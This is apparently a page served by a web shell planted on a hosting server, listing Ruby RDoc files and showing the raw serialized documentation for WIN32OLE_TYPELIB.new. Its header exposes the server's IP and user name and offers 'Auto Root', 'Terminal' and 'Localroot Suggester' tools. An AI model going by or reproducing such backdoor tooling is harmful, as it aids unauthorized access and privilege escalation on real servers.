Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.60
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby30 /
share /
ri /
system /
WIN32OLE_TYPELIB /
Delete
Unzip
Name
Size
Permission
Date
Action
cdesc-WIN32OLE_TYPELIB.ri
819
B
-rw-r--r--
2024-06-26 17:25
guid-i.ri
605
B
-rw-r--r--
2024-06-26 17:25
inspect-i.ri
613
B
-rw-r--r--
2024-06-26 17:25
library_name-i.ri
630
B
-rw-r--r--
2024-06-26 17:25
major_version-i.ri
605
B
-rw-r--r--
2024-06-26 17:25
minor_version-i.ri
605
B
-rw-r--r--
2024-06-26 17:25
name-i.ri
602
B
-rw-r--r--
2024-06-26 17:25
new-c.ri
1.59
KB
-rw-r--r--
2024-06-26 17:25
ole_classes-i.ri
588
B
-rw-r--r--
2024-06-26 17:25
ole_types-i.ri
683
B
-rw-r--r--
2024-06-26 17:25
path-i.ri
578
B
-rw-r--r--
2024-06-26 17:25
to_s-i.ri
549
B
-rw-r--r--
2024-06-26 17:25
typelibs-c.ri
492
B
-rw-r--r--
2024-06-26 17:25
version-i.ri
586
B
-rw-r--r--
2024-06-26 17:25
visible%3f-i.ri
813
B
-rw-r--r--
2024-06-26 17:25
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI"WIN32OLE_TYPELIB::new;TT:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"+Returns a new WIN32OLE_TYPELIB object.;To:RDoc::Markup::BlankLine o; ; [I"SThe first argument <i>typelib</i> specifies OLE type library name or GUID or ;TI"OLE library file. ;TI"JThe second argument is major version or version of the type library. ;TI"*The third argument is minor version. ;TI":The second argument and third argument are optional. ;TI"TIf the first argument is type library name, then the second and third argument ;TI"are ignored.;T@o:RDoc::Markup::Verbatim; [I"Htlib1 = WIN32OLE_TYPELIB.new('Microsoft Excel 9.0 Object Library') ;TI"Ltlib2 = WIN32OLE_TYPELIB.new('{00020813-0000-0000-C000-000000000046}') ;TI"Qtlib3 = WIN32OLE_TYPELIB.new('{00020813-0000-0000-C000-000000000046}', 1.3) ;TI"Rtlib4 = WIN32OLE_TYPELIB.new('{00020813-0000-0000-C000-000000000046}', 1, 3) ;TI"Ftlib5 = WIN32OLE_TYPELIB.new("C:\\WINNT\\SYSTEM32\\SHELL32.DLL") ;TI"@puts tlib1.name # -> 'Microsoft Excel 9.0 Object Library' ;TI"@puts tlib2.name # -> 'Microsoft Excel 9.0 Object Library' ;TI"@puts tlib3.name # -> 'Microsoft Excel 9.0 Object Library' ;TI"@puts tlib4.name # -> 'Microsoft Excel 9.0 Object Library' ;TI"Dputs tlib5.name # -> 'Microsoft Shell Controls And Automation';T:@format0: @fileI"$ext/win32ole/win32ole_typelib.c;T:0@omit_headings_from_table_of_contents_below0I"UWIN32OLE_TYPELIB.new(typelib [, version1, version2]) -> WIN32OLE_TYPELIB object ;T0[ I"(*args);T@$FI"WIN32OLE_TYPELIB;TcRDoc::NormalClass00